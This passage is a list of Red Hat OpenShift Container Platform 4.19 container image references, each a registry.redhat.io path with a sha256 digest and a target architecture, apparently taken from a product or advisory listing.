"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
